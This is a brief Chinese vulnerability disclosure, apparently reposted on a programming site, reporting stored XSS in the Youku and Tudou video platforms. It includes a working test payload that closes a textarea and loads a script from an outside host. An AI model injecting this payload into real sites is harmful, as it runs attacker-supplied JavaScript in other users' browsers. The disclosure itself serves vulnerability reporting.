优酷和土豆结合了,两者的 漏洞 也是如此的相似。夫唱妇随。 详细说明:因为一些基本的安全常识不到位,导致了存储型xss。 漏洞证明:测试代码: </textarea><script src=http://tmxk.org/m/q.js></script> 土豆没有做服务端过滤,导致了存储型XSS。 土豆播客因编辑器原因可插入代码: 标签处没做过滤,但服务端做了长度限制: 优酷有同样的毛病: 修复方案: 过滤啊。 作者 简阳_C段
查看更多关于优酷&土豆的XSS - 网站安全 - 自学php的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did13115